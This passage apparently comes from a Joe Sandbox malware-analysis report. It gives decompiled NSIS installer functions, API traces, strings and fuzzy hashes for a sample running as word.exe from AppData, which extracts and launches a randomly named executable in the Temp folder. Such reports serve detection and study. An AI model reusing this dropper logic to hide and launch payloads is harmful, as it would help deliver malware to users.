                                                          				long _t63;
                                                          				void* _t65;
                                                          				void* _t70;
                                                          				intOrPtr _t73;
                                                          				void* _t76;
                                                          				intOrPtr* _t78;
                                                          				intOrPtr _t79;
                                                          				long _t90;
                                                          				void* _t91;
                                                          				signed int _t100;
                                                          				intOrPtr _t103;
                                                          				void* _t111;
                                                          				signed int _t112;
                                                          				void* _t113;
                                                          				long _t114;
                                                          				long _t117;
                                                          				void* _t118;
                                                          
                                                          				_v8 = 0;
                                                          				_v20 = GetTickCount() + 0x3e8;
                                                          				_v12 = 0;
                                                          				_v16 = 0;
                                                          				GetModuleFileNameA(0, "C:\\Users\\Albus\\AppData\\Roaming\\word.exe", 0x400);
                                                          				_t113 = E004057CB("C:\\Users\\Albus\\AppData\\Roaming\\word.exe", 0x80000000, 3);
                                                          				 *0x409020 = _t113;
                                                          				if(_t113 == 0xffffffff) {
                                                          					return "Error launching installer";
                                                          				}
                                                          				E00405AF4("C:\\Users\\Albus\\AppData\\Roaming", "C:\\Users\\Albus\\AppData\\Roaming\\word.exe");
                                                          				E00405AF4(0x42b000, E0040562E("C:\\Users\\Albus\\AppData\\Roaming"));
                                                          				_t63 = GetFileSize(_t113, 0);
                                                          				 *0x41f0e0 = _t63;
                                                          				_t117 = _t63;
                                                          				if(_t63 <= 0) {
                                                          					L27:
                                                          					if( *0x423f2c == 0) {
                                                          						goto L36;
                                                          					}
                                                          					if(_v16 == 0) {
                                                          						L31:
                                                          						_t65 = GlobalAlloc(0x40, _v28); // executed
                                                          						_t118 = _t65;
                                                          						E00405EB4(0x40b008);
                                                          						E004057FA( &_v308, "C:\\Users\\Albus\\AppData\\Local\\Temp\\"); // executed
                                                          						_t70 = CreateFileA( &_v308, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                                                          						 *0x409024 = _t70;
                                                          						if(_t70 != 0xffffffff) {
                                                          							_t73 = E004032AF( *0x423f2c + 0x1c);
                                                          							 *0x41f0e4 = _t73;
                                                          							 *0x4170d8 = _t73 - ( !_v48 & 0x00000004) + _v24 - 0x1c; // executed
                                                          							_t76 = E00402F71(_v24, 0xffffffff, 0, _t118, _v28); // executed
                                                          							if(_t76 == _v28) {
                                                          								 *0x423f28 = _t118;
                                                          								 *0x423f30 =  *_t118;
                                                          								if((_v48 & 0x00000001) != 0) {
                                                          									 *0x423f34 =  *0x423f34 + 1;
                                                          								}
                                                          								_t54 = _t118 + 0x44; // 0x44
                                                          								_t78 = _t54;
                                                          								_t111 = 8;
                                                          								do {
                                                          									_t78 = _t78 - 8;
                                                          									 *_t78 =  *_t78 + _t118;
                                                          									_t111 = _t111 - 1;
                                                          								} while (_t111 != 0);
                                                          								_t79 =  *0x4170d4; // 0x5fc39
                                                          								 *((intOrPtr*)(_t118 + 0x3c)) = _t79;
                                                          								E0040578C(0x423f40, _t118 + 4, 0x40);
                                                          								return 0;
                                                          							}
                                                          							goto L36;
                                                          						}
                                                          						return "Error writing temporary file. Make sure your temp folder is valid.";
                                                          					}
                                                          					E004032AF( *0x4170d0);
                                                          					if(E0040327D( &_a4, 4) == 0 || _v12 != _a4) {
                                                          						goto L36;
                                                          					} else {
                                                          						goto L31;
                                                          					}
                                                          				} else {
                                                          					do {
                                                          						_t114 = _t117;
                                                          						asm("sbb eax, eax");
                                                          						_t90 = ( ~( *0x423f2c) & 0x00007e00) + 0x200;
                                                          						if(_t117 >= _t90) {
                                                          							_t114 = _t90;
                                                          						}
                                                          						_t91 = E0040327D(0x4170e0, _t114); // executed
                                                          						if(_t91 == 0) {
                                                          							if(_v8 != 0) {
                                                          								DestroyWindow(_v8);
                                                          							}
                                                          							L36:
                                                          							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
                                                          						}
                                                          						if( *0x423f2c != 0) {
                                                          							if((_a4 & 0x00000002) == 0) {
                                                          								if(_v8 == 0) {
                                                          									if(GetTickCount() > _v20) {
                                                          										_v8 = CreateDialogParamA( *0x423f20, 0x6f, 0, E00402BCA, "verifying installer: %d%%");
                                                          									}
                                                          								} else {
                                                          									E00405E13(0);
                                                          								}
                                                          							}
                                                          							goto L22;
                                                          						}
                                                          						E0040578C( &_v48, 0x4170e0, 0x1c);
                                                          						_t100 = _v48;
                                                          						if((_t100 & 0xfffffff0) == 0 && _v44 == 0xdeadbeef && _v32 == 0x74736e49 && _v36 == 0x74666f73 && _v40 == 0x6c6c754e) {
                                                          							_a4 = _a4 | _t100;
                                                          							_t112 =  *0x4170d0; // 0x0
                                                          							 *0x423fc0 =  *0x423fc0 | _a4 & 0x00000002;
                                                          							_t103 = _v24;
                                                          							 *0x423f2c = _t112;
                                                          							if(_t103 > _t117) {
                                                          								goto L36;
                                                          							}
                                                          							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                          								_v16 = _v16 + 1;
                                                          								_t25 = _t103 - 4; // 0x1c
                                                          								_t117 = _t25;
                                                          								if(_t114 > _t117) {
                                                          									_t114 = _t117;
                                                          								}
                                                          								goto L22;
                                                          							} else {
                                                          								break;
                                                          							}
                                                          						}
                                                          						L22:
                                                          						if(_t117 <  *0x41f0e0) {
                                                          							_v12 = E00405E46(_v12, 0x4170e0, _t114);
                                                          						}
                                                          						 *0x4170d0 =  *0x4170d0 + _t114;
                                                          						_t117 = _t117 - _t114;
                                                          					} while (_t117 > 0);
                                                          					if(_v8 != 0) {
                                                          						DestroyWindow(_v8);
                                                          					}
                                                          					goto L27;
                                                          				}
                                                          			}

                                                          APIs
                                                          • GetTickCount.KERNEL32(C:\Users\user\AppData\Roaming\word.exe,00000000,00000000), ref: 00402C8E
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\word.exe,00000400), ref: 00402CAE
                                                            • Part of subcall function 004057CB: GetFileAttributesA.KERNELBASE(00000003,00402CC1,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 004057CF
                                                            • Part of subcall function 004057CB: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004057F1
                                                          • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\word.exe,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 00402CF7
                                                          • DestroyWindow.USER32 ref: 00402E3F
                                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402E85
                                                          Strings
                                                          • Error launching installer, xrefs: 00402CCE
                                                          • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402F22
                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402ECE
                                                          • verifying installer: %d%%, xrefs: 00402DF2
                                                          • Null, xrefs: 00402D8B
                                                          • C:\Users\user\AppData\Roaming\word.exe, xrefs: 00402C94, 00402CA3, 00402CBB, 00402CD8
                                                          • Inst, xrefs: 00402D71
                                                          • C:\Users\user\AppData\Roaming\word.exe, xrefs: 00402C8A
                                                          • soft, xrefs: 00402D7E
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C7D, 00402E9D
                                                          • C:\Users\user\AppData\Roaming, xrefs: 00402CD9, 00402CDE, 00402CE4
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\word.exe$C:\Users\user\AppData\Roaming\word.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
                                                          • API String ID: 2181728824-2095694560
                                                          • Opcode ID: fa3c77b8c9c104c16c323750b5209556a5f99b4d0684dab4212019c86abb6d92
                                                          • Instruction ID: db3d77af3dcc15e42867082d874dfbf8a96a36a76704b09f65ca819f11d0ff47
                                                          • Opcode Fuzzy Hash: fa3c77b8c9c104c16c323750b5209556a5f99b4d0684dab4212019c86abb6d92
                                                          • Instruction Fuzzy Hash: DB81B031E40205ABDB20DFA4DE89A9E7AB4EB08355F14813BF505B62D1C7BC9E41CB9C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph
                                                          [Control-flow graph of the function at 0040309C; legend: Executed / Not Executed]
                                                          C-Code - Quality: 93%
                                                          			E0040309C(intOrPtr _a4) {
                                                          				long _v4;
                                                          				struct _OVERLAPPED* _v8;
                                                          				struct HWND__* _v12;
                                                          				void* __ecx;
                                                          				long _t10;
                                                          				intOrPtr _t14;
                                                          				long _t15;
                                                          				signed int _t16;
                                                          				void* _t18;
                                                          				void* _t19;
                                                          				long _t21;
                                                          				int _t26;
                                                          				long _t27;
                                                          				long _t31;
                                                          				long _t38;
                                                          				void* _t45;
                                                          				long _t46;
                                                          				intOrPtr _t48;
                                                          				void* _t50;
                                                          				long _t51;
                                                          				struct HWND__* _t52;
                                                          				long _t65;
                                                          
                                                          				_v8 = 0;
                                                          				_t10 = GetTickCount();
                                                          				_t46 =  *0x4170d4; // 0x5fc39
                                                          				_t45 = _t10 + 0x1f4;
                                                          				_t48 = _t46 -  *0x40b004 + _a4;
                                                          				if(_t48 <= 0) {
                                                          					L28:
                                                          					return 0;
                                                          				} else {
                                                          					E004032AF( *0x41f0e4);
                                                          					SetFilePointer( *0x409024,  *0x40b004, 0, 0);
                                                          					 *0x41f0e0 = _t48;
                                                          					 *0x4170d0 = 0;
                                                          					while(1) {
                                                          						_t14 =  *0x4170d8; // 0x49069
                                                          						_t38 = 0x4000;
                                                          						_t15 = _t14 -  *0x41f0e4;
                                                          						if(_t15 <= 0x4000) {
                                                          							_t38 = _t15;
                                                          						}
                                                          						_t16 = E0040327D(0x413090, _t38); // executed
                                                          						if(_t16 == 0) {
                                                          							break;
                                                          						}
                                                          						 *0x41f0e4 =  *0x41f0e4 + _t38;
                                                          						 *0x40b020 = 0x413090;
                                                          						 *0x40b024 = _t38;
                                                          						L6:
                                                          						L6:
                                                          						if( *0x423f28 != 0 &&  *0x423fc0 == 0) {
                                                          							if(_v8 == 0) {
                                                          								_t27 = GetTickCount();
                                                          								__eflags = _t27 - _t45;
                                                          								if(_t27 > _t45) {
                                                          									asm("sbb eax, eax");
                                                          									_t31 =  !( ~( *0x423f24)) & "unpacking data: %d%%";
                                                          									__eflags = _t31;
                                                          									_v12 = CreateDialogParamA( *0x423f20, 0x6f, 0, E00402BCA, _t31);
                                                          								}
                                                          							} else {
                                                          								 *0x4170d0 =  *0x41f0e0 -  *0x4170d4 - _a4 +  *0x40b004;
                                                          								E00405E13(0);
                                                          							}
                                                          						}
                                                          						 *0x40b028 = 0x40b090;
                                                          						 *0x40b02c = 0x8000; // executed
                                                          						_t18 = E00405ED4(0x40b008); // executed
                                                          						if(_t18 < 0) {
                                                          							goto L24;
                                                          						}
                                                          						_t50 =  *0x40b028; // 0x40cb56
                                                          						_t51 = _t50 - 0x40b090;
                                                          						if(_t51 == 0) {
                                                          							__eflags =  *0x40b024; // 0x0
                                                          							if(__eflags != 0) {
                                                          								goto L24;
                                                          							}
                                                          							__eflags = _t38;
                                                          							if(_t38 == 0) {
                                                          								goto L24;
                                                          							}
                                                          							L20:
                                                          							_t21 =  *0x4170d4; // 0x5fc39
                                                          							if(_t21 -  *0x40b004 + _a4 > 0) {
                                                          								continue;
                                                          							}
                                                          							SetFilePointer( *0x409024, _t21, 0, 0);
                                                          							_t52 = _v8;
                                                          							if(_t52 != 0) {
                                                          								 *0x4170d0 =  *0x41f0e0;
                                                          								SendMessageA(_t52, 0x113, 0, 0);
                                                          								DestroyWindow(_t52);
                                                          							}
                                                          							goto L28;
                                                          						}
                                                          						_t26 = WriteFile( *0x409024, 0x40b090, _t51,  &_v4, 0); // executed
                                                          						if(_t26 == 0 || _t51 != _v4) {
                                                          							_push(0xfffffffe);
                                                          							L25:
                                                          							_pop(_t19);
                                                          							return _t19;
                                                          						} else {
                                                          							 *0x40b004 =  *0x40b004 + _t51;
                                                          							_t65 =  *0x40b024; // 0x0
                                                          							if(_t65 != 0) {
                                                          								goto L6;
                                                          							}
                                                          							goto L20;
                                                          						}
                                                          						L24:
                                                          						_push(0xfffffffd);
                                                          						goto L25;
                                                          					}
                                                          					return _t16 | 0xffffffff;
                                                          				}
                                                          			}

                                                          APIs
                                                          • GetTickCount.KERNEL32(00000000,00000004,?,00000000,00000020,00000020,00402FA7,00000004,00000000,00000000,00000000,00000020,00000020,?,00402F1D,000000FF), ref: 004030A8
                                                            • Part of subcall function 004032AF: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EF6,?), ref: 004032BD
                                                          • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,00000020,00000020,00402FA7,00000004,00000000,00000000,00000000,00000020,00000020,?,00402F1D,000000FF), ref: 004030E7
                                                          • GetTickCount.KERNEL32(tCPInfo,00004000,?,00000000,00000020,00000020,00402FA7,00000004,00000000,00000000,00000000,00000020,00000020,?,00402F1D,000000FF), ref: 0040316D
                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402BCA,?), ref: 00403196
                                                          • WriteFile.KERNELBASE(0040B090,0040CB56,000000FF,00000000,tCPInfo), ref: 004031E3
                                                          • SetFilePointer.KERNEL32(0005FC39,00000000,00000000,tCPInfo,00004000,?,00000000,00000020,00000020,00402FA7,00000004,00000000,00000000,00000000,00000020,00000020), ref: 00403235
                                                          • SendMessageA.USER32 ref: 00403265
                                                          • DestroyWindow.USER32 ref: 0040326C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$CountTick$CreateDestroyDialogMessageParamSendWindowWrite
                                                          • String ID: tCPInfo
                                                          • API String ID: 131999699-2120998202
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 453 40177f-4017a2 call 402a85 call 405654 458 4017a4-4017aa call 405af4 453->458 459 4017ac-4017be call 405af4 call 4055e7 lstrcatA 453->459 464 4017c3-4017c9 call 405d03 458->464 459->464 469 4017ce-4017d2 464->469 470 4017d4-4017de call 405d9c 469->470 471 401805-401808 469->471 479 4017f0-401802 470->479 480 4017e0-4017ee CompareFileTime 470->480 472 401810-40182c call 4057cb 471->472 473 40180a-40180b call 4057ac 471->473 481 4018a4-4018cd call 404e9f call 402f71 472->481 482 40182e-401831 472->482 473->472 479->471 480->479 496 4018d5-4018e1 SetFileTime 481->496 497 4018cf-4018d3 481->497 483 401833-401875 call 405af4 * 2 call 405b16 call 405af4 call 4053c2 482->483 484 401886-401890 call 404e9f 482->484 483->469 516 40187b-40187c 483->516 494 401899-40189f 484->494 499 402923 494->499 498 4018e7-4018f2 CloseHandle 496->498 497->496 497->498 501 4018f8-4018fb 498->501 502 40291a-40291d 498->502 503 402925-402929 499->503 505 401910-401913 call 405b16 501->505 506 4018fd-40190e call 405b16 lstrcatA 501->506 502->499 513 401918-402276 call 4053c2 505->513 506->513 513->503 520 4026bf-4026c6 513->520 516->494 518 40187e-40187f 516->518 518->484 520->502
                                                          C-Code - Quality: 70%
                                                          			E0040177F(FILETIME* __ebx, void* __eflags) {
                                                          				void* _t33;
                                                          				void* _t41;
                                                          				void* _t43;
                                                          				FILETIME* _t49;
                                                          				FILETIME* _t62;
                                                          				void* _t64;
                                                          				signed int _t70;
                                                          				FILETIME* _t71;
                                                          				FILETIME* _t75;
                                                          				signed int _t77;
                                                          				CHAR* _t81;
                                                          				void* _t83;
                                                          				void* _t85;
                                                          
                                                          				_t75 = __ebx;
                                                          				_t81 = E00402A85(0x31);
                                                          				 *(_t85 - 0x3c) = _t81;
                                                          				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                                                          				_t33 = E00405654(_t81);
                                                          				_push(_t81);
                                                          				if(_t33 == 0) {
                                                          					lstrcatA(E004055E7(E00405AF4(0x4093f8, "C:\\Users\\Albus\\AppData\\Local\\Temp")), ??);
                                                          				} else {
                                                          					_push(0x4093f8);
                                                          					E00405AF4();
                                                          				}
                                                          				E00405D03(0x4093f8);
                                                          				while(1) {
                                                          					__eflags =  *(_t85 + 8) - 3;
                                                          					if( *(_t85 + 8) >= 3) {
                                                          						_t64 = E00405D9C(0x4093f8);
                                                          						_t77 = 0;
                                                          						__eflags = _t64 - _t75;
                                                          						if(_t64 != _t75) {
                                                          							_t71 = _t64 + 0x14;
                                                          							__eflags = _t71;
                                                          							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                                                          						}
                                                          						asm("sbb eax, eax");
                                                          						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                          						__eflags = _t70;
                                                          						 *(_t85 + 8) = _t70;
                                                          					}
                                                          					__eflags =  *(_t85 + 8) - _t75;
                                                          					if( *(_t85 + 8) == _t75) {
                                                          						E004057AC(0x4093f8);
                                                          					}
                                                          					__eflags =  *(_t85 + 8) - 1;
                                                          					_t41 = E004057CB(0x4093f8, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                          					__eflags = _t41 - 0xffffffff;
                                                          					 *(_t85 - 8) = _t41;
                                                          					if(_t41 != 0xffffffff) {
                                                          						break;
                                                          					}
                                                          					__eflags =  *(_t85 + 8) - _t75;
                                                          					if( *(_t85 + 8) != _t75) {
                                                          						E00404E9F(0xffffffe2,  *(_t85 - 0x3c));
                                                          						__eflags =  *(_t85 + 8) - 2;
                                                          						if(__eflags == 0) {
                                                          							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                          						}
                                                          						L31:
                                                          						 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t85 - 4));
                                                          						__eflags =  *0x423fa8;
                                                          						goto L32;
                                                          					} else {
                                                          						E00405AF4(0x409bf8, 0x424000);
                                                          						E00405AF4(0x424000, 0x4093f8);
                                                          						E00405B16(_t75, 0x4093f8, 0x409bf8, "C:\Users\Albus\AppData\Local\Temp",  *((intOrPtr*)(_t85 - 0x10)));
                                                          						E00405AF4(0x424000, 0x409bf8);
                                                          						_t62 = E004053C2("C:\Users\Albus\AppData\Local\Temp",  *(_t85 - 0x24) >> 3) - 4;
                                                          						__eflags = _t62;
                                                          						if(_t62 == 0) {
                                                          							continue;
                                                          						} else {
                                                          							__eflags = _t62 == 1;
                                                          							if(_t62 == 1) {
                                                          								 *0x423fa8 =  &( *0x423fa8->dwLowDateTime);
                                                          								L32:
                                                          								_t49 = 0;
                                                          								__eflags = 0;
                                                          							} else {
                                                          								_push(0x4093f8);
                                                          								_push(0xfffffffa);
                                                          								E00404E9F();
                                                          								L29:
                                                          								_t49 = 0x7fffffff;
                                                          							}
                                                          						}
                                                          					}
                                                          					L33:
                                                          					return _t49;
                                                          				}
                                                          				E00404E9F(0xffffffea,  *(_t85 - 0x3c));
                                                          				 *0x409250 =  *0x409250 + 1;
                                                          				_t43 = E00402F71(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 8), _t75, _t75); // executed
                                                          				 *0x409250 =  *0x409250 - 1;
                                                          				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                                                          				_t83 = _t43;
                                                          				if( *(_t85 - 0x18) != 0xffffffff) {
                                                          					L22:
                                                          					SetFileTime( *(_t85 - 8), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                                                          				} else {
                                                          					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
                                                          					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                                                          						goto L22;
                                                          					}
                                                          				}
                                                          				CloseHandle( *(_t85 - 8)); // executed
                                                          				__eflags = _t83 - _t75;
                                                          				if(_t83 >= _t75) {
                                                          					goto L31;
                                                          				} else {
                                                          					__eflags = _t83 - 0xfffffffe;
                                                          					if(_t83 != 0xfffffffe) {
                                                          						E00405B16(_t75, 0x4093f8, _t83, 0x4093f8, 0xffffffee);
                                                          					} else {
                                                          						E00405B16(_t75, 0x4093f8, _t83, 0x4093f8, 0xffffffe9);
                                                          						lstrcatA(0x4093f8,  *(_t85 - 0x3c));
                                                          					}
                                                          					_push(0x200010);
                                                          					_push(0x4093f8);
                                                          					E004053C2();
                                                          					goto L29;
                                                          				}
                                                          				goto L33;
                                                          			}

















                                                          APIs
                                                          • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BE
                                                          • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,00000000,00000000,C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017E8
                                                            • Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,00423720,NSIS Error), ref: 00405B01
                                                            • Part of subcall function 00404E9F: lstrlenA.KERNEL32(0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1,000000E5), ref: 00404ED8
                                                            • Part of subcall function 00404E9F: lstrlenA.KERNEL32(?,0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1), ref: 00404EE8
                                                            • Part of subcall function 00404E9F: lstrcatA.KERNEL32(0041FD08,?,?,0041FD08,?,00000000,?), ref: 00404EFB
                                                            • Part of subcall function 00404E9F: SetWindowTextA.USER32(0041FD08,0041FD08), ref: 00404F0D
                                                            • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F33
                                                            • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F4D
                                                            • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F5B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
                                                          • API String ID: 1941528284-1271094087
                                                          • Opcode ID: b97167aada2fa4578f9a117d5a902ee8dbf52284c50a83dde4a4e1865d353282
                                                          • Instruction ID: c1706ba1e04a40909550e17ecf840e167a7961d0d42511267d0e2aa6186e8961
                                                          • Opcode Fuzzy Hash: b97167aada2fa4578f9a117d5a902ee8dbf52284c50a83dde4a4e1865d353282
                                                          • Instruction Fuzzy Hash: 1941D331A10104BACB11BFA5DC85EBF3678EB85368B20423FF521F10E2CA7C49419B6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 521 402f71-402f80 522 402f82-402f98 SetFilePointer 521->522 523 402f9e-402fa9 call 40309c 521->523 522->523 526 403095-403099 523->526 527 402faf-402fc9 ReadFile 523->527 528 403092 527->528 529 402fcf-402fd2 527->529 531 403094 528->531 529->528 530 402fd8-402feb call 40309c 529->530 530->526 534 402ff1-402ff4 530->534 531->526 535 403061-403067 534->535 536 402ff6-402ff9 534->536 537 403069 535->537 538 40306c-40307f ReadFile 535->538 539 40308d-403090 536->539 540 402fff 536->540 537->538 538->528 541 403081-40308a 538->541 539->526 542 403004-40300c 540->542 541->539 543 403011-403023 ReadFile 542->543 544 40300e 542->544 543->528 545 403025-403028 543->545 544->543 545->528 546 40302a-40303f WriteFile 545->546 547 403041-403044 546->547 548 40305d-40305f 546->548 547->548 549 403046-403059 547->549 548->531 549->542 550 40305b 549->550 550->539
                                                          C-Code - Quality: 93%
                                                          			E00402F71(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
                                                          				long _v8;
                                                          				intOrPtr _v12;
                                                          				void _t31;
                                                          				intOrPtr _t32;
                                                          				int _t35;
                                                          				long _t36;
                                                          				int _t37;
                                                          				long _t38;
                                                          				int _t40;
                                                          				int _t42;
                                                          				long _t43;
                                                          				long _t44;
                                                          				long _t55;
                                                          				long _t57;
                                                          
                                                          				_t31 = _a4;
                                                          				if(_t31 >= 0) {
                                                          					_t44 = _t31 +  *0x423f78;
                                                          					 *0x4170d4 = _t44;
                                                          					SetFilePointer( *0x409024, _t44, 0, 0); // executed
                                                          				}
                                                          				_t57 = 4;
                                                          				_t32 = E0040309C(_t57);
                                                          				if(_t32 >= 0) {
                                                          					_t35 = ReadFile( *0x409024,  &_a4, _t57,  &_v8, 0); // executed
                                                          					if(_t35 == 0 || _v8 != _t57) {
                                                          						L23:
                                                          						_push(0xfffffffd);
                                                          						goto L24;
                                                          					} else {
                                                          						 *0x4170d4 =  *0x4170d4 + _t57;
                                                          						_t32 = E0040309C(_a4);
                                                          						_v12 = _t32;
                                                          						if(_t32 >= 0) {
                                                          							if(_a12 != 0) {
                                                          								_t36 = _a4;
                                                          								if(_t36 >= _a16) {
                                                          									_t36 = _a16;
                                                          								}
                                                          								_t37 = ReadFile( *0x409024, _a12, _t36,  &_v8, 0); // executed
                                                          								if(_t37 == 0) {
                                                          									goto L23;
                                                          								} else {
                                                          									_t38 = _v8;
                                                          									 *0x4170d4 =  *0x4170d4 + _t38;
                                                          									_v12 = _t38;
                                                          									goto L22;
                                                          								}
                                                          							} else {
                                                          								if(_a4 <= 0) {
                                                          									L22:
                                                          									_t32 = _v12;
                                                          								} else {
                                                          									while(1) {
                                                          										_t55 = 0x4000;
                                                          										if(_a4 < 0x4000) {
                                                          											_t55 = _a4;
                                                          										}
                                                          										_t40 = ReadFile( *0x409024, 0x413090, _t55,  &_v8, 0); // executed
                                                          										if(_t40 == 0 || _t55 != _v8) {
                                                          											goto L23;
                                                          										}
                                                          										_t42 = WriteFile(_a8, 0x413090, _v8,  &_a16, 0); // executed
                                                          										if(_t42 == 0 || _a16 != _t55) {
                                                          											_push(0xfffffffe);
                                                          											L24:
                                                          											_pop(_t32);
                                                          										} else {
                                                          											_t43 = _v8;
                                                          											_v12 = _v12 + _t43;
                                                          											_a4 = _a4 - _t43;
                                                          											 *0x4170d4 =  *0x4170d4 + _t43;
                                                          											if(_a4 > 0) {
                                                          												continue;
                                                          											} else {
                                                          												goto L22;
                                                          											}
                                                          										}
                                                          										goto L25;
                                                          									}
                                                          									goto L23;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				L25:
